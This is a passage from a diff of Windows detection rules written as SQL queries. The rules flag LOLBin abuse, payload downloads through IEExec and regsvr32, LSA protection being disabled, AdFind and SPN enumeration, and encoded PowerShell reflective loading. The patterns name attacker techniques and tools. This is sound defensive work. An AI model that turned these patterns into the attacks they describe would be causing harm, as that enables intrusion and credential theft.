NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Legitimate testing of Microsoft UI parts." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "status": "experimental", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.010" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administration activity" + "Authorized administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Google Drive", + "Citrix" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" - }, - { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - "description": "Commandline to launch powershell with a base64 payload", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "status": "test", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + 